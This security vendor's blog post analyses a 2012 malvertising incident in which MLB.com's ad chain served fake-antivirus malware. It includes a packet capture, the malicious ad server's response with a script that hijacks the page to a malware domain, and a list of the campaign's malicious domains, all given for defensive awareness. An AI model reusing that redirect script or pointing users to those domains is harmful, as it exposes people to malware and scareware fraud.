MLB.com distributing Fake AV Malware via compromised Ad Network

Perimeter’s Security Operations Center has discovered that Major League Baseball is distributing malware via a compromised ad network on its website.

Sadly, this has become an extremely common issue: well-known and respected websites inadvertently distribute malware due to one of their hosted syndicated ads being compromised. But first, a little background about how web advertising works. Most popular destination websites host ads. The website operator provides a spot (an IFRAME or DIV) where an ad network loads its ads. Many of these ad networks, in turn, load content from syndication partners and from other ad networks. At some point down the chain, one of these partners source the web ad from the advertiser’s web server. Because of the multiple layers of syndication between the website and originating ad server, it can be often very hard to understand exactly where the ad actually originated. It’s only a slight exaggeration to say that the lack of transparency and multiple indirect relationships can be so complicated that the average ad network makes the Fulton Fish Market look like the New York Stock Exchange by comparison. The bad guys know this, of course, which is why sites like the New York Times, for example, have accidentally served up malware in the past.

Over the past week, we noticed that several customers who attempted to download various “fake antivirus” malware had accessed MLB.com immediately before the installation attempt. We suspected a polluted ad network, but needed the proof. After page-refreshing MLB.com 20–30 times we were finally given the redirect shown and detailed below.

This specific drive-by download attempt actually requires quite a bit of user interaction. After clicking “Clean Computer” the user is prompted to download the file setup.exe which contains the actual fake-AV program. Like most fake-AV programs, it pretends to scan the victim’s computer, find files it claims are infected, and then attempts to get the victim to purchase the “Full Version” to remove the non existent threats for the low, low price of $99.99. This specific variant presents itself as “Windows Secure Web Patch”. Needless to say, this program is fraudulent, so do not  purchase it.

Technical Details

After analyzing the Packet Capture taken during the infection process, we verified that it is from an ad server referenced by MLB.com, specifically adginserver.com.

time = 2012-Jun-15 19:52:16

ip.dst = 78.159.121.107

query = q=zvCEjFbnwtAoOjktBLpz9Cs35+x5OSaQwpZhV0PW

referer = hxxp://mlb.mlb.com/news/?tcid=nav_mlb_news

client = Mozilla/4.0

alias.ip = 78.159.121.107

alias.host = adginserver.com <— Ad server pushing the fake-AV malware

country.dst = Germany

GET Request

GET /in?q=zvCEjFbnwtAoOjktBLpz9Cs35+x5OSaQwpZhV0PW HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-

flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/mswor

d, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdoc

ument, application/xaml+xml, */*

Referer: hxxp://mlb.mlb.com/news/?tcid=nav_mlb_news

Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET

CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)

Accept-Encoding: gzip, deflate

Host: adginserver.com

Connection: Keep-Alive

org.dst = Leaseweb Germany GmbH (previously netdirekt e. K.)

HTTP Response

HTTP/1.1 200 OK

Date: Fri, 15 Jun 2012 20:55:32 GMT

Server: Apache/2.2.21 (CentOS)

Content-Location: in.php

Vary: negotiate

TCN: choice

X-Powered-By: PHP/5.2.17

Content-Length: 160

Connection: close

Content-Type: text/html; charset=UTF-8

<html>

<body>

<script>

window.top.location.href=”hxxp://inspectionguarantorcustodian.in/78dee9e2710

84cb2/40/”;

</script>

</body>

</html>

Sites Involved in this Malware Campaign.

We have posted these for informational purposes only and STRONGLY RECOMMEND that you do not visit any of these pages unless you would like to infect yourself.

• brittlenessverifydanger.in
• cleanmonitordetector.in                                 x
• controltesterutility.in
• defenderstabilitycrashes.in
• guarantorefficiencysolver.in
• hightasksdanger.in
• informationbrittlenessmicrosoft.in
• netonlinestability.in
• perilsworryvulnerability.in
• protectremedyqueerprocess.in
• risksanalysis.in
• riskscenterantivirus.in
• risksthreatclean.in
• saverbrittlenessclean.in
• scandebuggerstability.in
• solutiondeliverertrojans.in
• systemtestrisks.in
• threatworryguarantor.in
• trojanscontrolsolver.in
• vulnerabilityqueerprocessbrittleness.in
• vulnerabilitysupervisionsaver.in
• worrycontrol.in

When we began investigating this particular malware campaign, the detection ratio by AV vendors was quite low. After running the malicious file through VirusTotal.com again today, it seems quite a few other AV providers now have detections for this fake-AV variant as seen here:

https://www.virustotal.com/file/042597537bd85333bd92d6e19dcc4e1cdd4663f1cda978098a60d9c56c426789/analysis/1340037948/

How Perimeter is protecting our customers

For Perimeter in-the-cloud (ITC) customers, we have added a null-route to blacklist the IP address that all of the malicious domains are resolving. This is the IP address which is actually serving the malware. We have submitted the advertising domain and .in domains to Fortinet to be recategorized as Malware until this issue can be resolved by MLB.com, which is currently still utilizing this advertising server.

For MSSP customers using Fortigate, you should take these additional steps to prevent infection:

• subscribe to Web Content Filtering while blocking the Advertising and Unrated categories
• subscribe to network anti-virus with download of Executables blocked

In the meantime, we suggest that you avoid the MLB website. If you need to catch up on your baseball scores, consider espn.com.

Andrew Jaquith contributed to this post.